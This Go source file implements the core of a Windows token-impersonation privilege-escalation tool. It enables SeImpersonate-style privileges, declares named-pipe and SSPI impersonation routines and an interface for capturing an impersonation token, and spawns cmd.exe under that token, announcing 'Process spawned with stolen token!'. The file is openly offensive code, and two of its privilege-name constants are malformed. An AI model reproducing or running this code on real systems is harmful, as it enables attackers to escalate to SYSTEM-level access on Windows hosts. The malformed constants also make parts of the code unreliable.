package main
import (
"fmt"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
)
/*
type (
BOOL uint32
BOOLEAN byte
BYTE byte
DWORD uint32
DWORD64 uint64
HANDLE uintptr
HLOCAL uintptr
LARGE_INTEGER int64
LONG int32
LPVOID uintptr
SIZE_T uintptr
UINT uint32
ULONG_PTR uintptr
ULONGLONG uint64
WORD uint16
)
*/
// Package-level constants, grouped by the Windows subsystem they belong to.
// All numeric values are untyped so they can be passed straight to
// LazyProc.Call (uintptr) as well as to the typed x/sys/windows wrappers.
const (
	// Privilege names handed to EnablePrivilege / LookupPrivilegeValue.
	// LookupPrivilegeValue rejects names it does not recognise, in which
	// case EnablePrivilege returns false.
	SE_IMPERSONATE          = "SeImpersonatePrivilege"
	SE_ASSIGN_PRIMARY_TOKEN = "SeAssignPrimaryToken"
	SE_INCREASE_QUOTE_NAME  = "SeIncreaseQuoteName"

	// SSPI (Secur32) constants; the matching procs are declared in the
	// var block below.
	SECPKG_CRED_INBOUND     = 0x00000001
	SECBUFFER_VERSION       = 0x00000000
	SECBUFFER_TOKEN         = 0x00000002
	ASC_REQ_ALLOCATE_MEMORY = 0x00000100
	ASC_REQ_CONNECTION      = 0x00000800
	SECURITY_NATIVE_DREP    = 0x00000010
	SecurityImpersonation   = 0x00000002

	// Process-creation inputs used by ExecuteWithToken.
	CREATE_NEW_CONSOLE = 0x00000010
	program            = "C:\\Windows\\System32\\cmd.exe"
	args               = ""
)
// Lazily resolved Win32 entry points. NewLazyDLL/NewProc do not load anything
// until the first Call, so declaring them at package level has no effect on
// platforms where the DLLs are absent until a proc is actually invoked.

// advapi32.dll: token and security-descriptor routines.
var (
	advapi32DLL                  = syscall.NewLazyDLL("advapi32.dll")
	impersonateNamedPipeClient   = advapi32DLL.NewProc("ImpersonateNamedPipeClient")
	createProcessWithTokenW      = advapi32DLL.NewProc("CreateProcessWithTokenW")
	setSecurityDescriptorDacl    = advapi32DLL.NewProc("SetSecurityDescriptorDacl")
	initializeSecurityDescriptor = advapi32DLL.NewProc("InitializeSecurityDescriptor")
)

// Secur32.dll: SSPI routines (credential handle, context acceptance and
// token query). Only createProcessWithTokenW from the set above is called by
// ExecuteWithToken; the remaining procs are used elsewhere in the file.
var (
	secur32DLL                = syscall.NewLazyDLL("Secur32.dll")
	acquireCredentialsHandle  = secur32DLL.NewProc("AcquireCredentialsHandleW")
	acceptSecurityContext     = secur32DLL.NewProc("AcceptSecurityContext")
	querySecurityContextToken = secur32DLL.NewProc("QuerySecurityContextToken")
)
// ITokenNegotiator is the contract for a component that provokes an inbound
// connection and then serves it to obtain an impersonation token.
type ITokenNegotiator interface {
	// Serve handles the inbound connection and reports the outcome as a
	// NegotiatorResult (token or error).
	Serve() NegotiatorResult
	// Trigger starts the activity that causes the inbound connection and
	// reports whether it was initiated successfully.
	Trigger() bool
}
// NegotiatorResult is the outcome of ITokenNegotiator.Serve: either an
// impersonation token or the error that prevented obtaining one. The code
// here does not establish whether both fields may be set at once — callers
// should check Error before dereferencing ImpersonationToken.
type NegotiatorResult struct {
	// ImpersonationToken is the token obtained from the served connection;
	// nil when Error is set (presumably — confirm against Serve implementations).
	ImpersonationToken *windows.Token
	// Error describes why no token could be obtained.
	Error error
}
// ExecuteWithToken starts the package-level program (with args) under token.
// It first calls advapi32!CreateProcessWithTokenW; if that call reports a
// non-zero errno it falls back to windows.CreateProcessAsUser, which needs
// the caller to hold the privileges described in its own error message.
// The process and thread handles returned in ProcessInformation are not
// closed here. Returns the CreateProcessAsUser error, or nil on success.
func ExecuteWithToken(token windows.Token) error {
	var (
		startup  windows.StartupInfo
		procInfo windows.ProcessInformation
	)
	app := windows.StringToUTF16Ptr(program)
	cmdLine := windows.StringToUTF16Ptr(args)

	// LazyProc.Call returns the errno as its third value; Errno(0) means
	// the call itself did not set an error.
	_, _, callErr := createProcessWithTokenW.Call(
		uintptr(token), 0,
		uintptr(unsafe.Pointer(app)), uintptr(unsafe.Pointer(cmdLine)),
		CREATE_NEW_CONSOLE, 0, 0,
		uintptr(unsafe.Pointer(&startup)), uintptr(unsafe.Pointer(&procInfo)),
	)
	if callErr != syscall.Errno(0) {
		fmt.Println("[!] CreateProcessWithTokenW failed, trying CreateProcessAsUser ", callErr)
		fallbackErr := windows.CreateProcessAsUser(token, app, cmdLine, nil, nil, false, CREATE_NEW_CONSOLE, nil, nil, &startup, &procInfo)
		if fallbackErr != nil {
			fmt.Println("[!] CreateProcessAsUser failed. You may have the SeImpersonate privilege but are not running in an elevated context")
			return fallbackErr
		}
	}
	fmt.Println("[*] Process spawned with stolen token!")
	return nil
}
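// EnablePrivilege enables the named privilege (for example one of the SE_*
// constants) on the current process token.
//
// It returns false when the privilege name cannot be looked up, when the
// process token cannot be opened, or when AdjustTokenPrivileges fails either
// through its error return or through a non-nil GetLastError afterwards
// (presumably the case where the call succeeds but the privilege was not
// actually assigned — confirm against the Win32 documentation).
//
// The process token handle opened here is closed on every return path.
func EnablePrivilege(securityEntity string) bool {
	var luid windows.LUID
	if err := windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(securityEntity), &luid); err != nil {
		return false
	}

	var token windows.Token
	if err := windows.OpenProcessToken(windows.CurrentProcess(), windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token); err != nil {
		return false
	}
	// This function owns the token handle; release it so repeated calls do
	// not accumulate open handles.
	defer token.Close()

	tokenPrivs := windows.Tokenprivileges{
		PrivilegeCount: 1,
		Privileges: [1]windows.LUIDAndAttributes{
			{Luid: luid, Attributes: windows.SE_PRIVILEGE_ENABLED},
		},
	}
	// 1024 is the length argument for the previous-state buffer, which is
	// not requested here (nil), so the value is not used by the callee.
	if err := windows.AdjustTokenPrivileges(token, false, &tokenPrivs, 1024, nil, nil); err != nil {
		return false
	}
	return windows.GetLastError() == nil
}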